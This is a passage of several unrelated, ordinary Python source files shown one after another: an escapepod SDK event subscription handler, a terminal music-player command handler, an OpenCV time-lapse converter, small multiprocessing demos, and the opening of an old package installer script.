return thr
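# A minimal usage sketch (recipient, subject, template name and kwargs are
# placeholders; templates email/welcome.txt and email/welcome.html are assumed
# to exist):
#
#   thr = send_email('user@example.com', 'Welcome!', 'email/welcome', name='Alice')
#   thr.join(timeout=5)  # optional: wait for the background send, e.g. in tests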
|
events.py
|
# Copyright (c) 2021 cyb3rdog
# Based on Anki Vector Python SDK
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Event handler used to make functions subscribe to escapepod proxy events.
"""
__all__ = ['EventHandler', 'Events']
import asyncio
from google.protobuf.text_format import MessageToString
from concurrent.futures import CancelledError
from enum import Enum
import threading
from typing import Callable
import uuid
from .connection import Connection
from .messaging import protocol
from .messages import keep_alive, subscribed, process_intent
from . import util
class Events(Enum):
"""List of available events."""
# EscapePod Extension Proxy Events
subscribed = "Subscribed" # : Event containing the subscription session guid.
unsubscribed= "UnSubscribed" # : Event triggered when Client unsubscribes from escapepod extension proxy.
keep_alive = "KeepAlive" # : Event triggered when a keep_alive message is sent from escape pod to client
process_intent = "ProcessIntent" # : Event triggered when a vector hears an intent registered on escapepod
class _EventCallback:
def __init__(self, callback, *args, _on_connection_thread: bool = False, **kwargs):
self._extra_args = args
self._extra_kwargs = kwargs
self._callback = callback
self._on_connection_thread = _on_connection_thread
@property
def on_connection_thread(self):
return self._on_connection_thread
@property
def callback(self):
return self._callback
@property
def extra_args(self):
return self._extra_args
@property
def extra_kwargs(self):
return self._extra_kwargs
def __eq__(self, other):
other_cb = other
if hasattr(other, "callback"):
other_cb = other.callback
return other_cb == self.callback
def __hash__(self):
return self._callback.__hash__()
class EventHandler:
"""Listen for EscapePod extension proxy events."""
def __init__(self, client, robot, keep_alive):
self.logger = util.get_class_logger(__name__, self)
self._client = client
self._robot = robot
self._conn = None
self._conn_id = None
self._keepalive = keep_alive
self._subscriber_uuid = None
self.listening_for_events = False
self.event_future = None
self._thread: threading.Thread = None
self._loop: asyncio.BaseEventLoop = None
self.subscribers = {}
self._done_signal: asyncio.Event = None
@property
def subscribed(self) -> bool:
"""A property to determine whether the event stream is subscribed to escapepod extension proxy."""
return self._subscriber_uuid is not None
def start(self, connection: Connection):
"""Start listening for events. Automatically called by the :class:`escapepod_sdk.extension.Client` class.
:param connection: A reference to the connection from the SDK to the escapepod.
:param loop: The loop to run the event task on.
"""
self._conn = connection
self.listening_for_events = True
self._thread = threading.Thread(target=self._run_thread, daemon=True, name="Event Stream Handler Thread")
self._thread.start()
def _run_thread(self):
try:
self._loop = asyncio.new_event_loop()
asyncio.set_event_loop(self._loop)
self._done_signal = asyncio.Event(loop=self._loop)
# create an event stream handler on the connection thread
self.event_future = asyncio.run_coroutine_threadsafe(self._handle_event_stream(), self._conn.loop)
async def wait_until_done():
return await self._done_signal.wait()
self._loop.run_until_complete(wait_until_done())
finally:
self._loop.close()
def close(self):
"""Stop listening for events. Automatically called by the :class:`escapepod_sdk.extension.Client` class."""
self.listening_for_events = False
try:
self._handle_stream_closing()
if self.event_future:
self.event_future.cancel()
self.event_future.result()
except CancelledError:
pass
try:
if self._loop: self._loop.call_soon_threadsafe(self._done_signal.set)  # let _run_thread's loop finish so the thread can exit
if self._thread:
self._thread.join(timeout=5)
self._thread = None
except CancelledError:
pass
def _notify(self, event_callback, event_name, event_data):
loop = self._loop
thread = self._thread
# For high priority events that shouldn't be blocked by user callbacks
# they will run directly on the connection thread. This should typically
# be used when setting robot properties from events.
if event_callback.on_connection_thread:
loop = self._conn.loop
thread = self._conn.thread
callback = event_callback.callback
args = event_callback.extra_args
kwargs = event_callback.extra_kwargs
if asyncio.iscoroutinefunction(callback):
callback = callback(self._robot, event_name, event_data, *args, **kwargs)
elif not asyncio.iscoroutine(callback):
async def call_async(fn, *args, **kwargs):
fn(*args, **kwargs)
callback = call_async(callback, self._robot, event_name, event_data, *args, **kwargs)
if threading.current_thread() is thread:
future = asyncio.ensure_future(callback, loop=loop)
else:
future = asyncio.run_coroutine_threadsafe(callback, loop=loop)
future.add_done_callback(self._done_callback)
def _done_callback(self, completed_future):
exc = completed_future.exception()
if exc:
self.logger.error("Event callback exception: %s", exc)
if isinstance(exc, TypeError) and "positional arguments but" in str(exc):
self.logger.error("The subscribed function may be missing parameters in its definition. Make sure it has robot, event_type and event positional parameters.")
async def dispatch_event_by_name(self, event_data, event_name: str):
"""Dispatches event to event listeners by name.
.. testcode::
import escapepod_sdk
def event_listener(none, name, msg):
print(name) # will print 'my_custom_event'
print(msg) # will print 'my_custom_event dispatched'
with escapepod_sdk.extension.Client() as client:
client.events.subscribe_by_name(event_listener, event_name='my_custom_event')
client.conn.run_coroutine(client.events.dispatch_event_by_name('my_custom_event dispatched', event_name='my_custom_event'))
:param event_data: Data to accompany the event.
:param event_name: The name of the event that will result in func being called.
"""
if not event_name:
self.logger.error('Bad event_name in dispatch_event.')
if event_name in self.subscribers.keys():
subscribers = self.subscribers[event_name].copy()
for callback in subscribers:
self._notify(callback, event_name, event_data)
async def dispatch_event(self, event_data, event_type: Events):
"""Dispatches event to event listeners."""
if not event_type:
self.logger.error('Bad event_type in dispatch_event.')
event_name = event_type.value
await self.dispatch_event_by_name(event_data, event_name)
def _unpack_event(self, response):
event_name = protocol.MessageType.Name(response.message_type)
event_data = response.message_data
if event_name == 'KeepAlive':
event_data = keep_alive(response)
if event_name == "ProcessIntent":
event_data = process_intent(response)
return event_name, event_data
async def _handle_event_stream(self):
self._conn_id = bytes(uuid.uuid4().hex, "utf-8")
try:
req = protocol.SubscribeRequest(keep_alive=self._keepalive)
async for response in self._conn.grpc_interface.Subscribe(req):
if not self.listening_for_events:
break
try:
self.logger.debug(f"ProxyMessage {MessageToString(response, as_one_line=True)}")
if response.message_type == protocol.Subscribed:
self._subscriber_uuid = subscribed(response).uuid
self.logger.info("Successfully subscribed to Cyb3rVector EscapePod Extension event stream")
elif response.message_type == protocol.Unsubscribed:
self._subscriber_uuid = None
self.logger.info(f"Successfully unsubscribed from Cyb3rVector EscapePod extension event stream")
event_name, event_data = self._unpack_event(response)
await self.dispatch_event_by_name(event_data, event_name)
except TypeError:
self.logger.warning('Unknown Event type')
except CancelledError:
self.logger.info('Disconnecting from Cyb3rVector EscapePod Extension event stream.')
except Exception as e:
print(e)
def _handle_stream_closing(self):
if self.subscribed:
request = protocol.UnsubscribeRequest(uuid=self._subscriber_uuid)
self._conn.run_coroutine(self._conn.grpc_interface.UnSubscribe(request))
self._subscriber_uuid = None
def subscribe_by_name(self, func: Callable, event_name: str, *args, **kwargs):
"""Receive a method call when the specified event occurs.
.. testcode::
import escapepod_sdk
def event_listener(none, name, msg):
print(name) # will print 'my_custom_event'
print(msg) # will print 'my_custom_event dispatched'
with escapepod_sdk.extension.Client() as client:
client.events.subscribe_by_name(event_listener, event_name='my_custom_event')
client.conn.run_coroutine(client.events.dispatch_event_by_name('my_custom_event dispatched', event_name='my_custom_event'))
:param func: A method implemented in your code that will be called when the event is fired.
:param event_name: The name of the event that will result in func being called.
:param args: Additional positional arguments to this function will be passed through to the callback in the provided order.
:param kwargs: Additional keyword arguments to this function will be passed through to the callback.
"""
if not event_name:
self.logger.error('Bad event_name in subscribe.')
if event_name not in self.subscribers.keys():
self.subscribers[event_name] = set()
self.subscribers[event_name].add(_EventCallback(func, *args, **kwargs))
def subscribe(self, func: Callable, event_type: Events, *args, **kwargs):
"""Receive a method call when the specified event occurs.
:param func: A method implemented in your code that will be called when the event is fired.
:param event_type: The enum type of the event that will result in func being called.
:param args: Additional positional arguments to this function will be passed through to the callback in the provided order.
:param kwargs: Additional keyword arguments to this function will be passed through to the callback.
"""
if not event_type:
self.logger.error('Bad event_type in subscribe.')
event_name = event_type.value
self.subscribe_by_name(func, event_name, *args, **kwargs)
def unsubscribe_by_name(self, func: Callable, event_name: str):
"""Unregister a previously subscribed method from an event.
.. testcode::
import escapepod_sdk
def event_listener(none, name, msg):
print(name) # will print 'my_custom_event'
print(msg) # will print 'my_custom_event dispatched'
with escapepod_sdk.extension.Client() as client:
client.events.subscribe_by_name(event_listener, event_name='my_custom_event')
client.conn.run_coroutine(client.events.dispatch_event_by_name('my_custom_event dispatched', event_name='my_custom_event'))
:param func: The method you no longer wish to be called when an event fires.
:param event_name: The name of the event for which you no longer want to receive a method call.
"""
if not event_name:
self.logger.error('Bad event_name in unsubscribe.')
if event_name in self.subscribers.keys():
event_subscribers = self.subscribers[event_name]
if func in event_subscribers:
event_subscribers.remove(func)
if not event_subscribers:
self.subscribers.pop(event_name, None)
else:
self.logger.error(f"The function '{func.__name__}' is not subscribed to '{event_name}'")
else:
self.logger.error(f"Cannot unsubscribe from event_type '{event_name}'. "
"It has no subscribers.")
def unsubscribe(self, func: Callable, event_type: Events):
"""Unregister a previously subscribed method from an event.
:param func: The method you no longer wish to be called when the event fires.
:param event_type: The enum type of the event for which you no longer want to receive a method call.
"""
if not event_type:
self.logger.error('Bad event_type in unsubscribe.')
event_name = event_type.value
self.unsubscribe_by_name(func, event_name)
|
command_handler.py
|
import threading
import pyperclip
from colorama import Fore
from vlcyt.lyrics_scraper import get_lyrics
class CommandHandler:
"""
Handles user input for VLCYT
"""
_help_commands = ["?", "help"]
_volume_commands = ["volume", "v"]
_skip_commands = ["skip", "s", "next", "n", "forward", "f"]
_play_commands = ["play", "pause", "p"]
_repeat_commands = ["repeat", "replay", "r"]
_back_commands = ["back", "b"]
_loop_commands = ["loop", "l"]
_shuffle_commands = ["shuffle"]
_copy_url_commands = ["copy", "c", "url"]
_lyrics_commands = ["lyrics"]
_exit_commands = ["exit", "quit", "q", "x"]
def __init__(self, vlcyt):
self.vlcyt = vlcyt
self.input_thread = threading.Thread(target=self._get_input)
self.input_thread.daemon = True
self.skip_song = False # Becomes True if the user enters the skip command
self.exit_program = False # Becomes True if the user enters the exit command
self.loop_song = False # Becomes True if the user enters the loop command
self.shuffle_playlist = False # Becomes True if the user enters the shuffle command
self.back_song = False # Becomes True if the user enters the back command
self.back_amount = 1 # How many entries back in song_history to pop when skipping back
def _get_input(self):
"""
Gathers user input from the input thread and executes commands.
"""
while True:
command_name, command_value = self._get_command()
if command_name in self._help_commands:
self.command_help()
elif command_name in self._volume_commands:
self.command_set_volume(command_value)
elif command_name in self._skip_commands:
self.command_skip_song(command_value)
elif command_name in self._play_commands:
self.command_p()
elif command_name in self._repeat_commands:
self.command_repeat()
elif command_name in self._back_commands:
self.command_back()
elif command_name in self._loop_commands:
self.command_loop()
elif command_name in self._shuffle_commands:
self.command_shuffle()
elif command_name in self._copy_url_commands:
self.command_copy_url()
elif command_name in self._lyrics_commands:
self.command_lyrics()
elif command_name in self._exit_commands:
self.exit_program = True
else:
print(f"{Fore.RED}Invalid command{Fore.RESET}")
def _get_command(self):
"""
Processes a command from the user.
Output: tuple: command name string, command value string
"""
command = ""
while command == "":
command = input(self.vlcyt.command_string).lower()
split_command = command.split()
try:
command_name = split_command[0]
command_value = split_command[1]
except IndexError:
command_value = None
return command_name, command_value
def input_features_enabled(self):
"""
Returns True if loop, shuffle, back, or skip are enabled.
"""
input_features = [
self.loop_song,
self.shuffle_playlist,
self.back_song,
self.skip_song,
]
return True in input_features
def command_help(self):
print(
f"""{Fore.MAGENTA}======================================
{Fore.YELLOW}NOTE: Most commands have multiple aliases separated by commas, use whichever you prefer.
{Fore.CYAN}VLCYT Commands:
{Fore.GREEN}?, help{Fore.WHITE}
Opens this help menu and shows whether or not looping and shuffling are enabled.
{Fore.GREEN}volume, v{Fore.WHITE}
Adjust the volume (0 - 100).
{Fore.GREEN}skip, s, next, n, forward, f{Fore.WHITE}
Skips song(s).
For example: Entering "skip" will skip one song,
entering "skip 5" will skip 5 songs.
{Fore.GREEN}play, pause, p{Fore.WHITE}
Plays/Pauses the current song.
{Fore.GREEN}repeat, replay, r{Fore.WHITE}
Repeats the current song one time.
{Fore.GREEN}back, b{Fore.WHITE}
Skips to the last song played.
{Fore.GREEN}loop, l{Fore.WHITE}
Enables looping.
The current song will keep playing until looping is disabled.
{Fore.GREEN}shuffle{Fore.WHITE}
Shuffles the playlist without repeating until every song has been played.
{Fore.GREEN}copy, c, url{Fore.WHITE}
Copies the current song's YouTube URL.
{Fore.GREEN}lyrics
{Fore.YELLOW}EXPERIMENTAL:{Fore.WHITE} Attempts to retrieve the current song's lyrics.
Needs to be improved.
{Fore.GREEN}exit, quit, q, x{Fore.WHITE}
Closes the program.
{Fore.MAGENTA}======================================
{Fore.CYAN}---Settings---{Fore.RESET}
{Fore.GREEN}Looping:{Fore.RESET} {f"{Fore.GREEN}Enabled{Fore.RESET}" if self.loop_song else f"{Fore.RED}Disabled{Fore.RESET}"}
{Fore.GREEN}Shuffling:{Fore.RESET} {f"{Fore.GREEN}Enabled{Fore.RESET}" if self.shuffle_playlist else f"{Fore.RED}Disabled{Fore.RESET}"}
{Fore.CYAN}--------------{Fore.RESET}"""
)
def command_set_volume(self, volume):
"""
Sets VLC volume.
"""
if not volume:
print(
f"Volume: {Fore.GREEN}{self.vlcyt.vlc_player.audio_get_volume()}{Fore.RESET}"
)
return
try:
volume = int(volume)
except (TypeError, ValueError):
print(f"{Fore.RED}Bad input.{Fore.RESET} Enter an integer from 0 - 100.")
return
if 0 <= volume <= 100:
self.vlcyt.vlc_player.audio_set_volume(volume)
print(f"Volume set to {Fore.GREEN}{volume}{Fore.RESET}")
else:
print(f"{Fore.RED}Volume out of range.{Fore.RESET} Range: 0 - 100")
def command_skip_song(self, amount_to_skip):
"""
Skips the current song.
Round robins if it causes the song counter to go over the total amount of songs in the playlist.
"""
if amount_to_skip is not None:
try:
amount_to_skip = int(amount_to_skip)
except (TypeError, ValueError):
print(f"{Fore.RED}Bad input.{Fore.RESET} Enter a number.")
return
if amount_to_skip in [1, None]:
self.vlcyt.song_index = (
self.vlcyt.song_index + 1
if self.vlcyt.song_index < self.vlcyt.total_songs
else 0
)
self.skip_song = True
elif amount_to_skip > 1:
potential_index = self.vlcyt.song_index + amount_to_skip
if potential_index <= self.vlcyt.total_songs:
self.vlcyt.song_index += amount_to_skip - 1
else: # Round robin
total_multiplier = potential_index // self.vlcyt.total_songs
self.vlcyt.song_index = (
potential_index - 1 - self.vlcyt.total_songs * total_multiplier
)
self.skip_song = True
else:
print(f"{Fore.RED}Bad input.{Fore.RESET} Enter a value greater than 0.")
def command_repeat(self):
"""
Repeats the current song.
"""
self.vlcyt.vlc_player.set_time(0)
def command_p(self):
"""
Plays/Pauses the current song.
"""
self.vlcyt.vlc_player.pause()
def command_back(self):
"""
Play last song in history.
"""
if self.vlcyt.song_history and self.vlcyt.song_index != 0:
self.back_song = True
self.skip_song = True
else:
print(f"{Fore.RED}No songs in history{Fore.RESET}")
def command_loop(self):
"""
Enables/Disables looping the current song.
"""
if not self.loop_song:
self.loop_song = True
print(f"Looping {Fore.GREEN}enabled.{Fore.RESET}")
else:
self.loop_song = False
print(f"Looping {Fore.RED}disabled.{Fore.RESET}")
def command_shuffle(self):
if not self.shuffle_playlist:
self.shuffle_playlist = True
print(f"Shuffle {Fore.GREEN}enabled.{Fore.RESET}")
else:
self.shuffle_playlist = False
print(f"Shuffle {Fore.RED}disabled.{Fore.RESET}")
def command_copy_url(self):
pyperclip.copy(
"https://www.youtube.com/watch?v=" + self.vlcyt.current_song.videoid
)
print(f"{Fore.GREEN}Song URL Copied")
def command_lyrics(self):
print(
f"{Fore.MAGENTA}======================================{Fore.RESET}", end=""
)
try:
print(get_lyrics(self.vlcyt._clean_title()))
except (AttributeError, IndexError):
print(f"\n{Fore.RED}Failed to retrieve song lyrics :({Fore.RESET}")
print(f"{Fore.MAGENTA}======================================{Fore.RESET}")
|
025_convert_video_to_time-lapse.py
|
import pathlib
import queue
import threading
import cv2
import json
# Global variables (populated in main from setting.json)
INPUT_FILE = ""
TIME_LAPSE_FRAME_RATE = 0
OUTPUT_FRAME_RATE = 0
OUTPUT_WIDTH = 0
OUTPUT_HEIGHT = 0
DISPLAY_STRING = ""
def convert_time(ct_time):
"""Convert seconds to hours, minutes, and seconds.
Args:
ct_time (int/float):Seconds to be converted.
Returns:
string: Hours, minutes, seconds converted from seconds.
"""
ct_hour = int(ct_time / 3600)
ct_minute = int((ct_time - ct_hour * 3600) / 60)
ct_second = int(ct_time - ct_hour * 3600 - ct_minute * 60)
return f"{ct_hour:02}h{ct_minute:02}m{ct_second:02}sec"
def read_frame(target_paths, frame_queue):
"""Extract a specific video frame from the videos indicated by the paths.
Args:
target_paths (list): Input video including path
frame_queue (instance): a FIFO queue
"""
# Elapsed time shown in the time-lapse
total_frame_index = 0
# Read each input file
for path in target_paths:
# Get the frame rate
capture = cv2.VideoCapture(str(path))
# Check whether the file could be opened
if not capture.isOpened():
return
# Get the fps of the input file
frame_fps = capture.get(cv2.CAP_PROP_FPS)
# Elapsed time of the individual video
frame_index = 0
while True:
result, frame = capture.read()
# Check whether the read succeeded
if not result:
break
if frame_index % TIME_LAPSE_FRAME_RATE == 0:
# Show progress
print(f"[read] {path}:{convert_time(frame_index/frame_fps)}")
# Put the image data on the queue
frame_queue.put([total_frame_index, frame_fps, frame])
frame_index += 1
total_frame_index += 1
capture.release()
# When everything is finished, send None on the queue to signal the end
frame_queue.put([total_frame_index, frame_fps, None])
def write_frame(frame_queue):
"""Output a video of a new size by adding time and text to the input frame.
Args:
frame_queue (list): total_frame_index, frame_fps, frame
"""
# Create the VideoWriter object
# The output file is out.mp4
# Keep this consistent with the resize dimensions
video_writer = cv2.VideoWriter("out.mp4",
cv2.VideoWriter_fourcc("m", "p", "4", "v"),
OUTPUT_FRAME_RATE,
(OUTPUT_WIDTH, OUTPUT_HEIGHT))
while True:
# Get data from the queue
total_frame_index, frame_fps, frame = frame_queue.get()
try:
# Exit when there is no more data (None sentinel received)
if frame is None:
break
else:
# Resize
frame_resize = cv2.resize(frame, dsize=(OUTPUT_WIDTH, OUTPUT_HEIGHT))
# Draw the text
cv2.putText(frame_resize,
# String to draw
convert_time(total_frame_index / frame_fps) + DISPLAY_STRING,
# Display position of the text
(0, 50),
# Font type
cv2.FONT_HERSHEY_PLAIN,
# Font scale
3.0,
# Text color (blue, green, red)
(255, 255, 255),
# Line thickness of the text
5,
# Algorithm (line type) used to draw the text
cv2.LINE_AA)
video_writer.write(frame_resize)
finally:
# Mark the task as done on the queue
frame_queue.task_done()
video_writer.release()
def main():
# Load the settings from the JSON configuration file
global INPUT_FILE
global TIME_LAPSE_FRAME_RATE
global OUTPUT_FRAME_RATE
global OUTPUT_WIDTH
global OUTPUT_HEIGHT
global DISPLAY_STRING
setting = json.load(open("setting.json", "r", encoding="utf-8"))
INPUT_FILE = setting["SEARCH_FILE"]["NAME"]
TIME_LAPSE_FRAME_RATE = setting["INPUT_FILE"]["TIME_LAPSE_SPEED"]
OUTPUT_FRAME_RATE = setting["OUTPUT_FILE"]["FRAME_RATE"]
OUTPUT_WIDTH = setting["OUTPUT_FILE"]["OUTPUT_WIDTH"]
OUTPUT_HEIGHT = setting["OUTPUT_FILE"]["OUTPUT_HEIGHT"]
DISPLAY_STRING = setting["DISPLAY"]["STRING"]
# Collect the input files
# Use the current directory
target_dir = pathlib.Path(".")
# Get and sort the MTS files
target_paths = sorted(target_dir.glob(INPUT_FILE))
if target_paths:
# Set up the queue
frame_queue = queue.Queue(maxsize=10)
# Set up the worker threads
# (Though this may be no different from sequential processing??)
read_frame_worker = threading.Thread(
target=read_frame,
daemon=True,
kwargs={"target_paths": target_paths, "frame_queue": frame_queue},)
read_frame_worker.start()
write_frame_worker = threading.Thread(
target=write_frame, daemon=True, kwargs={"frame_queue": frame_queue},)
write_frame_worker.start()
# Block until the queue processing has finished
read_frame_worker.join()
write_frame_worker.join()
else:
print(f"There is no videos named {INPUT_FILE}.")
if __name__ == "__main__":
main()
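# An assumed example of setting.json, inferred from the keys read in main():
#
#   {
#       "SEARCH_FILE": {"NAME": "*.MTS"},
#       "INPUT_FILE": {"TIME_LAPSE_SPEED": 30},
#       "OUTPUT_FILE": {"FRAME_RATE": 30, "OUTPUT_WIDTH": 1280, "OUTPUT_HEIGHT": 720},
#       "DISPLAY": {"STRING": " elapsed"}
#   }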
|
test.py
|
from multiprocessing import Process,Queue
import os
import time
q = Queue()
def _write(q):
print('Process(%s) is writing...' % os.getpid())
while 1:
time.sleep(2)
url = 100
q.put(url)
print('Put %s to queue...' % url)
if __name__ == "__main__":
p = Process(target=_write,args=(q,))
p.start()
p.join()
# Reference: https://www.cnblogs.com/itogo/p/5635629.html
|
primes.py
|
import multiprocessing
from itertools import count
PRIMES_PER_PROCESS = 16
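# How the pipeline below works: each checker process holds PRIMES_PER_PROCESS
# known primes. A candidate divisible by none of them is either reported as
# prime (if it is below the square of this stage's largest prime, so the check
# was conclusive) or forwarded on the queue chain to the next checker.
# A "stop" sentinel flushes the whole pipeline.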
def check_divisbility(primes, number):
return all(number % x for x in primes)
def checker(primes, in_potentials, out_primes, out_potentials):
maximum = primes[-1] ** 2
while True:
potential = in_potentials.get()
if potential == "stop":
out_potentials.put("stop")
return
if check_divisbility(primes, potential):
if potential < maximum:
out_primes.put(potential)
else:
out_potentials.put(potential)
def printer(in_primes):
while True:
num = in_primes.get()
if num == "stop":
return
print("Prime:", num)
def main():
integers = count(2)
initial_primes = []
while len(initial_primes) < multiprocessing.cpu_count() * PRIMES_PER_PROCESS:
num = next(integers)
if check_divisbility(initial_primes, num):
initial_primes.append(num)
primes = multiprocessing.Queue()
for p in initial_primes:
primes.put(p)
source = top = multiprocessing.Queue()
print_process = multiprocessing.Process(target=printer, args=(primes,))
print_process.start()
processes = []
for i in range(0, len(initial_primes), PRIMES_PER_PROCESS):
potentials = multiprocessing.Queue()
proc = multiprocessing.Process(
target=checker,
args=(
initial_primes[i : i + PRIMES_PER_PROCESS],
source,
primes,
potentials,
),
)
proc.start()
processes.append(proc)
source = potentials
for i in range(initial_primes[-1] + 1, initial_primes[-1] ** 2):
top.put(i)
top.put("stop")
for proc in processes:
proc.join()
primes.put("stop")
print_process.join()
if __name__ == "__main__":
main()
|
pyinstall.py
|
#!C:\Users\sinsu\PycharmProjects\pythonProject1\venv\Scripts\python.exe
import sys
import os
import optparse
import pkg_resources
import urllib2
import urllib
import mimetypes
import zipfile
import tarfile
import tempfile
import subprocess
import posixpath
import re
import shutil
try:
from hashlib import md5
except ImportError:
import md5 as md5_module
md5 = md5_module.new
import urlparse
from email.FeedParser import FeedParser
import traceback
from cStringIO import StringIO
import socket
from Queue import Queue
from Queue import Empty as QueueEmpty
import threading
import httplib
import time
import logging
class InstallationError(Exception):
"""General exception during installation"""
class DistributionNotFound(InstallationError):
"""Raised when a distribution cannot be found to satisfy a requirement"""
if getattr(sys, 'real_prefix', None):
## FIXME: is build/ a good name?
base_prefix = os.path.join(sys.prefix, 'build')
base_src_prefix = os.path.join(sys.prefix, 'src')
else:
## FIXME: this isn't a very good default
base_prefix = os.path.join(os.getcwd(), 'build')
base_src_prefix = os.path.join(os.getcwd(), 'src')
pypi_url = "http://pypi.python.org/simple"
default_timeout = 15
parser = optparse.OptionParser(
usage='%prog [OPTIONS] PACKAGE_NAMES')
parser.add_option(
'-e', '--editable',
dest='editables',
action='append',
default=[],
metavar='svn+REPOS_URL[@REV]#egg=PACKAGE',
help='Install a package directly from a checkout. Source will be checked '
'out into src/PACKAGE (lower-case) and installed in-place (using '
'setup.py develop). This option may be provided multiple times.')
parser.add_option(
'-r', '--requirement',
dest='requirements',
action='append',
default=[],
metavar='FILENAME',
help='Install all the packages listed in the given requirements file. '
'This option can be used multiple times.')
parser.add_option(
'-f', '--find-links',
dest='find_links',
action='append',
default=[],
metavar='URL',
help='URL to look for packages at')
parser.add_option(
'-i', '--index-url',
dest='index_url',
metavar='URL',
default=pypi_url,
help='base URL of Python Package Index')
parser.add_option(
'--extra-index-url',
dest='extra_index_urls',
metavar='URL',
action='append',
default=[],
help='extra URLs of package indexes to use in addition to --index-url')
parser.add_option(
'-b', '--build', '--build-dir', '--build-directory',
dest='build_dir',
metavar='DIR',
default=None,
help='Unpack packages into DIR (default %s) and build from there' % base_prefix)
parser.add_option(
'--src', '--source',
dest='src_dir',
metavar='DIR',
default=None,
help='Check out --editable packages into DIR (default %s)' % base_src_prefix)
parser.add_option(
'--timeout',
metavar='SECONDS',
dest='timeout',
type='float',
default=default_timeout,
help='Set the socket timeout (default %s seconds)' % default_timeout)
parser.add_option(
'-U', '--upgrade',
dest='upgrade',
action='store_true',
help='Upgrade all packages to the newest available version')
parser.add_option(
'-I', '--ignore-installed',
dest='ignore_installed',
action='store_true',
help='Ignore the installed packages (reinstalling instead)')
parser.add_option(
'--no-install',
dest='no_install',
action='store_true',
help="Download and unpack all packages, but don't actually install them")
parser.add_option(
'--bundle',
dest='bundle',
metavar='BUNDLE_FILE',
help="Collect all packages and create a .pybundle file.")
parser.add_option(
'--freeze',
dest='freeze',
metavar='FREEZE_FILE',
help="Create a file that can be used with --requirement to reproduce the "
"installed packages. You can also give one --requirement file that will "
"be used as the basis of the new file.")
parser.add_option(
'-E', '--environment',
dest='venv',
metavar='DIR',
help='virtualenv environment to run pyinstall in (either give the '
'interpreter or the environment base directory)')
parser.add_option(
'-v', '--verbose',
dest='verbose',
action='count',
default=0,
help='Give more output')
parser.add_option(
'-q', '--quiet',
dest='quiet',
action='count',
default=0,
help='Give less output')
parser.add_option(
'--log',
dest='log',
metavar='FILENAME',
help='Log file where a complete (maximum verbosity) record will be kept')
parser.add_option(
'--proxy',
dest='proxy',
type='str',
default='',
help="Specify a proxy in the form user:passwd@proxy.server:port. "
"Note that the user:password@ is optional and required only if you "
"are behind an authenticated proxy. If you provide "
"user@proxy.server:port then you will be prompted for a password."
)
parser.add_option(
'--install-option',
dest='install_options',
action='append',
help="Extra arguments to be supplied to the setup.py install "
"command (use like --install-option=\"--install-scripts=/usr/local/bin\"). "
"Use multiple --install-option options to pass multiple options to setup.py install"
)
def get_proxy(proxystr=''):
"""Get the proxy given the option passed on the command line. If an
empty string is passed it looks at the HTTP_PROXY environment
variable."""
if not proxystr:
proxystr = os.environ.get('HTTP_PROXY', '')
if proxystr:
if '@' in proxystr:
user_password, server_port = proxystr.split('@', 1)
if ':' in user_password:
user, password = user_password.split(':', 1)
else:
user = user_password
import getpass
prompt = 'Password for %s@%s: ' % (user, server_port)
password = urllib.quote(getpass.getpass(prompt))
return '%s:%s@%s' % (user, password, server_port)
else:
return proxystr
else:
return None
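# Assumed examples of get_proxy's behaviour (illustrative, not original code):
#   get_proxy('alice:secret@proxy.example.com:3128') -> 'alice:secret@proxy.example.com:3128'
#   get_proxy('alice@proxy.example.com:3128')        -> prompts for a password, returns 'alice:<password>@proxy.example.com:3128'
#   get_proxy('') with HTTP_PROXY unset              -> None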
def setup_proxy_handler(proxystr=''):
"""Set the proxy handler given the option passed on the command
line. If an empty string is passed it looks at the HTTP_PROXY
environment variable. """
proxy = get_proxy(proxystr)
if proxy:
proxy_support = urllib2.ProxyHandler({"http": proxy, "ftp": proxy})
opener = urllib2.build_opener(proxy_support, urllib2.CacheFTPHandler)
urllib2.install_opener(opener)
def main(initial_args=None):
global logger
if initial_args is None:
initial_args = sys.argv[1:]
options, args = parser.parse_args(initial_args)
if args and args[-1] == '___VENV_RESTART___':
## FIXME: We don't do anything with this value yet:
venv_location = args[-2]
args = args[:-2]
options.venv = None
level = 1 # Notify
level += options.verbose
level -= options.quiet
level = Logger.level_for_integer(4-level)
complete_log = []
logger = Logger([(level, sys.stdout),
(Logger.DEBUG, complete_log.append)])
if options.venv:
if options.verbose > 0:
# The logger isn't setup yet
print 'Running in environment %s' % options.venv
restart_in_venv(options.venv, initial_args)
# restart_in_venv should actually never return, but for clarity...
return
## FIXME: not sure if this should come before or after venv restart
if options.log:
log_fp = open_logfile_append(options.log)
logger.consumers.append((logger.DEBUG, log_fp))
else:
log_fp = None
socket.setdefaulttimeout(options.timeout or None)
setup_proxy_handler(options.proxy)
if options.bundle:
if not options.build_dir:
options.build_dir = backup_dir(base_prefix, '-bundle')
if not options.src_dir:
options.src_dir = backup_dir(base_src_prefix, '-bundle')
# We have to get everything when creating a bundle:
options.ignore_installed = True
logger.notify('Putting temporary build files in %s and source/develop files in %s'
% (display_path(options.build_dir), display_path(options.src_dir)))
if not options.build_dir:
options.build_dir = base_prefix
if not options.src_dir:
options.src_dir = base_src_prefix
options.build_dir = os.path.abspath(options.build_dir)
options.src_dir = os.path.abspath(options.src_dir)
install_options = options.install_options or []
try:
if options.freeze:
if options.requirements:
if len(options.requirements) > 1:
raise InstallationError(
"When using --freeze you can only provide one --requirement option")
requirement = options.requirements[0]
else:
requirement = None
write_freeze(
options.freeze,
requirement=requirement,
find_links=options.find_links)
return
index_urls = [options.index_url] + options.extra_index_urls
finder = PackageFinder(
find_links=options.find_links,
index_urls=index_urls)
requirement_set = RequirementSet(build_dir=options.build_dir,
src_dir=options.src_dir,
upgrade=options.upgrade,
ignore_installed=options.ignore_installed)
for name in args:
requirement_set.add_requirement(
InstallRequirement.from_line(name, None))
for name in options.editables:
requirement_set.add_requirement(
InstallRequirement.from_editable(name))
for filename in options.requirements:
for req in parse_requirements(filename, finder=finder):
requirement_set.add_requirement(req)
exit = 0
requirement_set.install_files(finder)
if not options.no_install and not options.bundle:
requirement_set.install(install_options)
logger.notify('Successfully installed %s' % requirement_set)
elif options.bundle:
requirement_set.create_bundle(options.bundle)
logger.notify('Created bundle in %s' % options.bundle)
else:
